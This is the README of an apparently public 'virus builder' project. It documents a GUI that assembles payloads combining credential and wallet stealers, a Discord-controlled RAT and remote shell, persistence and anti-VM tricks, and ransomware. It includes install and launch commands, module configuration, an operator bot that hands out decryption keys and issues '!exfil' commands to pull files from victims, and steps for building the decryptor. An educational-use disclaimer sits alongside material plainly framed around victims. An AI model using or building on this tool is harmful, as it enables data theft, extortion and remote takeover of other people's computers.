BLX Virus Builder Tool — Everything the builder needs is in this folder.
| Link | Description |
|---|---|
| Project | Blx-Virus-Builder |
| Author | BenzoXdev |
This tool is provided for educational and cybersecurity research purposes only.
The author, contributors and maintainers of this project disclaim all responsibility and fully exempt themselves from any legal, criminal, civil or contractual obligation relating to:
- The use of this software, whether lawful or unlawful;
- Any damage direct or indirect caused by the use of this tool;
- Any legal proceedings, fines, sanctions or convictions resulting from the use of this software;
- Any law violation (unauthorized access, system compromise, data theft, etc.) committed by the user;
- Any content or data exfiltrated, encrypted or modified via this tool.
By using this software, you agree to:
- Use it only in a legal context (authorized testing, pentest, academic research);
- Be solely responsible for your actions and their legal consequences;
- That the author cannot under any circumstances be held liable for your actions.
Any use of this software to attack systems without explicit authorization is prohibited and punishable by law. The author disclaims all responsibility in case of misuse.
📄 See DISCLAIMER.md for the full legal notice.
- Overview
- Workflow
- Builder Interface
- Quick Install
- Project Structure
- Using the Builder
- Stealer Options
- Malware Options
- RAT and Backdoor Config
- Ransomware Option
- Ransomware Config in Builder
- Decryptor (BLX_Decryptor)
- Discord Bot (BLX_Ransomware_Bot)
- Bot Configuration
- Build Decryptor as EXE
- Build Output
- Dependencies
BLX Virus Builder is a graphical tool (GUI) for creating custom payloads for security testing and cybersecurity research. It combines Stealer (data theft), Malware (disruptive actions), RAT, Backdoor and Ransomware modules in a single configurable build.
| Category | Description |
|---|---|
| Stealer | Passwords, cookies, Discord sessions, wallets, etc. |
| Malware | Block keyboard/mouse, popup, shutdown, anti-VM, etc. |
| RAT | Remote control via Discord |
| Backdoor | Remote shell via Discord |
| Ransomware | .blx encryption + decryptor + operator bot |
Complete builder flow, from configuration to output:
| Step | Description |
|---|---|
| 1. Configuration | Discord Webhook URL, options checked |
| 2. Stealer modules | Passwords, Cookies, Discord, Wallets, etc. |
| 3. Malware modules | Block keys, RAT, Backdoor, Ransomware |
| 4. Compilation | PyInstaller (for .exe) or raw Python script |
| 5. Output | Files in 1-Output/VirusBuilder/ |
Main GUI preview:
The interface provides tabs for Stealer and Malware options, a Webhook field, checkboxes for each module, and a Build button to generate the payload.
# 1. Clone the repository
git clone https://github.com/BenzoXdev/Blx-Virus-Builder.git
cd Blx-Virus-Builder
# 2. Install dependencies
pip install -r requirements.txt
# 3. Launch the builder
python Virus-Builder.pyWindows: you can use run.bat or setup.bat if provided.
Virus Builder/
├── Virus-Builder.py # Entry point: run this file
├── Config/
│ ├── __init__.py
│ ├── Config.py # Configuration (name, version, etc.)
│ └── Util.py # Utilities (banner, colors, Reset, etc.)
├── FileDetectedByAntivirus/
│ ├── __init__.py
│ ├── BuilderOptions.py # Build blocks: CORE, STEALER, MALWARE, DISCORD
│ └── blxOP/ # (optional)
├── Ransomware/
│ ├── BLX_Decryptor.py # .blx decryptor (give to victim with key)
│ ├── BLX_Ransomware_Bot.py # Discord bot: !key, !keys, !exfil, !info, !decryptor
│ ├── BLX_ransomware_bot_config.example.json
│ ├── build_decryptor_exe.bat # Compile BLX_Decryptor to EXE
│ └── README.md # Ransomware quick reference
├── Img/
│ ├── BLX_icon.ico
│ ├── 7752569.ico
│ ├── architecture.png # Workflow diagram
│ ├── build-process.png # Build process
│ └── builder-interface.png # Interface preview
├── 1-Output/
│ └── VirusBuilder/ # Build output + BLX_ransomware_keys.json
├── requirements.txt
├── run.bat
├── setup.bat
└── README.md
- Discord Webhook: enter the webhook URL (required) and test if needed.
- Options: check the desired modules (Stealer and/or Malware), see Stealer Options and Malware Options.
- Optional configs: for RAT, Backdoor or Ransomware, check the option then confirm the config window that opens.
- Build:
- File name: name for the future .py or .exe.
- Type: Python File (.py) or Exe File (.exe).
- Icon: choose a .ico (especially for Exe File).
- Click Build; files are created in
1-Output/VirusBuilder/.
| Option | Description |
|---|---|
| System Info | System info (OS, CPU, RAM, etc.) |
| Wallets Session Files | Crypto wallet session files |
| Games Session Files | Game launcher session files |
| Telegram Session Files | Telegram session files |
| Roblox Accounts | Roblox accounts |
| Discord Accounts | Discord accounts (tokens, etc.) |
| Discord Injection | Injection into Discord client |
| Passwords | Browser passwords |
| Cookies | Browser cookies |
| Browsing History | Browsing history |
| Download History | Download history |
| Cards | Saved credit cards |
| Extentions | Browser extensions |
| Interesting Files | Files deemed interesting |
| Webcam | Webcam capture |
| Screenshot | Screenshot |
| Option | Description |
|---|---|
| Block Key | Block keyboard |
| Block Mouse | Block mouse |
| Block Task Manager | Block Task Manager |
| Block AV Website | Block access to antivirus sites |
| Shutdown | Shut down the machine |
| Message Popup | Show a window (title, message, type: info/warning/error/question) |
| Spam Open Program | Open programs in a loop |
| Spam Create File | Create files in a loop |
| Anti VM & Debug | VM / debug detection (do not run in certain environments) |
| Launch at Startup | Launch at Windows startup |
| Restart Every 5min | Restart payload every 5 minutes |
| RAT | Discord RAT (remote control) — config: token, server ID, persistence, admin required |
| Backdoor (Shell) | Discord backdoor / shell — config: token, server ID, persistence, admin required |
| Ransomware | .blx encryption + decryptor + operator bot — see Ransomware Option |
- RAT: check « RAT » then open the config (by clicking the box). Enter Bot Token, Server ID, optionally Persistence and Admin required.
- Backdoor: check « Backdoor (Shell) » then open the config. Enter Bot Token, Server ID, Persistence, Admin required.
If the Ransomware option is enabled in the build:
- Keys: stored in
1-Output/VirusBuilder/BLX_ransomware_keys.jsonand copied toRansomware/BLX_ransomware_keys.json. - Decryptor: the builder automatically compiles BLX_Decryptor.exe and embeds it in the payload (placed on victim’s Desktop). Manual compilation: Build Decryptor as EXE.
- Operator bot: run
python Ransomware\BLX_Ransomware_Bot.py(from project root). The bot reads keys fromRansomware\BLX_ransomware_keys.jsonor1-Output\VirusBuilder\BLX_ransomware_keys.json. - Bot config: copy
Ransomware\BLX_ransomware_bot_config.example.jsontoRansomware\BLX_ransomware_bot_config.jsonand fill at least token and server_id. Details: Bot Configuration.
By checking Ransomware and opening the config window (click on the box), you can set:
| Field | Description |
|---|---|
| Open Ransomware folder | Button: opens the project Ransomware folder. |
| Bot Token | Discord bot token (for !key, etc. commands). |
| Server ID | Discord server ID. |
| Webhook URL | Webhook for victim reports (can be the same as main webhook). |
| Exfil Bot Token | Second bot token (listens for victim !exfil). Optional. |
| Exfil Channel ID | Channel ID where the bot sends !exfil commands (payload listens on this channel). Optional. |
| Excluded extensions | Non-encrypted extensions, comma-separated. E.g.: .exe,.dll,.sys (empty = no extension exclusion). |
| Excluded paths | Paths under which files are not encrypted, comma-separated. E.g.: C:\Users\Public (empty = none). |
| README text | Custom message written in README_BLX.txt on victim’s Desktop (empty = default message). |
| Delay before encryption | Delay in seconds before starting encryption (0 = immediate, max 86400). |
File: Ransomware/BLX_Decryptor.py
To be given to the victim with the decryption key (base64, 32 bytes) provided by the bot: !key <victim_id>.
- Paste the key (base64) received.
- Choose the folder to decrypt (default: user folder).
- Count .blx: counts
.blxfiles in the folder (background calculation). - Decrypt .blx files: starts decryption.
- Progress: progress bar and current file.
- Stop: interrupts decryption.
- At the end: report (Desktop or target folder), key stored (AppData or next to script), cleanup (persistence, README_BLX.txt) and auto-deletion of decryptor on success.
Features: progress, Stop, .blx count, key storage, detailed report (success/failures).
python Ransomware/BLX_Decryptor.py --cliEnter the key (base64) and folder to decrypt (Enter = default user folder).
File: Ransomware/BLX_Ransomware_Bot.py
From the project root (Virus Builder):
python Ransomware\BLX_Ransomware_Bot.pyThe bot reads config from Ransomware\BLX_ransomware_bot_config.json and keys from Ransomware\BLX_ransomware_keys.json or 1-Output\VirusBuilder\BLX_ransomware_keys.json.
| Command | Description |
|---|---|
!key <victim_id> |
Sends the decryption key by DM to the command author. |
!key <victim_id> <channel_id> |
Sends the key in the specified channel (instead of DM). |
!keys |
Lists Victim IDs in the key file. |
!exfil <victim_id> <file_path> |
Sends an exfiltration command to the victim’s payload (if exfil configured). E.g.: !exfil ABC123 C:\Users\victim\Desktop\file.txt (max 8 MB, under C:\Users). |
!info |
Shows bot status (key file, victim count, exfil, roles). |
!info <victim_id> |
Indicates if a key exists for this Victim ID. |
!decryptor |
Reminder of instructions for the victim (use of BLX_Decryptor.exe). |
!help |
Shows command help. |
If allowed_role_ids is set in the config, only users with at least one of these roles can use the commands. Otherwise, everyone can use them.
If log_file is set in the config, each command is logged to that file (date, command, author, channel).
- Copy
Ransomware/BLX_ransomware_bot_config.example.jsontoRansomware/BLX_ransomware_bot_config.json. - Fill at least:
- token: Discord bot token.
- server_id: Discord server ID.
- Optional:
- exfil_channel_id: Channel ID where the bot sends
!exfilcommands (victim payload listens on this channel). - allowed_role_ids: List of role IDs allowed to use commands (empty = all).
- log_file: Path to a file for logging commands (empty = no file logging).
- exfil_channel_id: Channel ID where the bot sends
Full example:
{
"token": "YOUR_BOT_TOKEN",
"server_id": "SERVER_ID",
"exfil_channel_id": "EXFIL_CHANNEL_ID",
"allowed_role_ids": ["ROLE_ID_1", "ROLE_ID_2"],
"log_file": "Ransomware/command_log.txt"
}To compile BLX_Decryptor.py to BLX_Decryptor.exe (single file, no console):
- Open a terminal in the Ransomware folder:
cd Ransomware - Run:
or manually:
build_decryptor_exe.bat
python -m PyInstaller --onefile --windowed --name BLX_Decryptor --icon "..\Img\7752569.ico" --clean BLX_Decryptor.py - The executable is in
Ransomware\dist\BLX_Decryptor.exe.
The Virus Builder can also automatically compile and embed this decryptor in the payload when building with the Ransomware option enabled (placed on victim’s Desktop).
- Generated files (.py or .exe):
1-Output/VirusBuilder/ - Ransomware keys (if option enabled):
1-Output/VirusBuilder/BLX_ransomware_keys.json- Copy to
Ransomware/BLX_ransomware_keys.jsonfor the bot.
See requirements.txt. Main ones:
| Category | Packages |
|---|---|
| Builder (GUI) | colorama, cryptography, customtkinter, requests, discord.py, pyinstaller |
| Stealer / browsers | browser-cookie3, pycryptodome |
| System / hardware | psutil, GPUtil, screeninfo |
| Webcam / capture | opencv-python, Pillow, mss |
| Keyboard / mouse | keyboard, pyautogui, pynput |
| Audio | sounddevice, scipy |
| RAT / misc | comtypes, pycaw, numpy |
| Windows | pywin32 |
| Optional | auto-py-to-exe, bcrypt, beautifulsoup4, selenium, etc. |
pip install -r requirements.txtBLX Virus Builder — Educational use only
